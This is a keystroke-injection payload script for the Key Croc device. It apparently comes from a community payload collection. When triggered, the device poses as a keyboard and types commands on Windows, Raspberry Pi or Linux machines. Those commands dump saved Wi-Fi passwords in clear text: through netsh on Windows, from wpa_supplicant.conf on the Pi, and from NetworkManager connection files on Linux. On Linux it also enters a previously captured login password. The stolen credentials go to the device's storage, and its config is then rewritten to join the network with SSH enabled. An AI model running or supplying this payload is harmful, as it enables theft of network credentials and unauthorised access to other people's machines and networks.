# Title:           Croc_Getonline
# Description:     Attempt to connect Keycroc automatically to target wifi access point
#                  Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
# Author:          spywill
# Version:         2.0
# Category:        Key Croc
# Props:           Cribbit, Lodrix, potong, RootJunky

MATCH (getonline_W|getonline_R|getonline_L)
Q LOCK

CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done

if [ -f /root/udisk/tools/Croc_Pot/wifipass.txt ]; then
	cat /root/udisk/tools/Croc_Pot/wifipass.txt >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
	rm -f /root/udisk/tools/Croc_Pot/wifipass.txt
fi

ATTACKMODE HID STORAGE
Q DELAY 5000
LED ATTACK

case $LOOT in
	getonline_W)
		Q GUI r
		Q DELAY 3000
		Q STRING "powershell"
		Q ENTER
		Q DELAY 5000
		Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
		Q ENTER
		Q DELAY 3000
		Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Out-File -Encoding UTF8 \"\$Croc\tools\Croc_Pot\wifipass.txt\""
		Q ENTER
		Q DELAY 6000
		Q STRING "exit"
		Q ENTER
		sed -i '/^[[:space:]]*$/d' /root/udisk/tools/Croc_Pot/wifipass.txt
		sed -i '$!d' /root/udisk/tools/Croc_Pot/wifipass.txt
		sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/wifipass.txt
;;
	getonline_R)
		Q CONTROL-ALT-d
		Q CONTROL-ALT-t
		Q DELAY 2000
		Q STRING "RASPBERRY_PI=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/wifipass.txt"
		Q ENTER
		Q DELAY 2000
		Q STRING "t_ssid=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
		Q ENTER
		Q DELAY 2000
		Q STRING "t_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$t_ssid/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
		Q ENTER
		Q DELAY 2000
		Q STRING "echo \"\$t_ssid \$t_pw\" > \$RASPBERRY_PI"
		Q ENTER
		Q DELAY 2000
		Q STRING "exit"
		Q ENTER
;;
	getonline_L)
		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
			PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
		else
			PC_PW=LINUX
		fi
		Q ALT F2
		Q DELAY 2000
		Q STRING "xterm"
		Q ENTER
		Q DELAY 2000
		Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
		Q ENTER
		Q DELAY 2000
		Q STRING "$PC_PW"
		Q ENTER
		Q DELAY 2000
		Q STRING "LINUX_ON=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/wifipass.txt"
		Q ENTER
		Q DELAY 2000
		Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sed -e 's/=/ /g' | tee \$LINUX_ON"
		Q ENTER
		Q DELAY 2000
		Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
		Q ENTER
		Q DELAY 2000
		Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/; exit"
		Q ENTER
;;
esac

ATTACKMODE HID
Q DELAY 2000
Q UNLOCK

LED SETUP
sed -i 's/\( \)*/\1/g' /root/udisk/tools/Croc_Pot/wifipass.txt
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p root/udisk/tools/Croc_Pot/wifipass.txt#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
LED FINISH
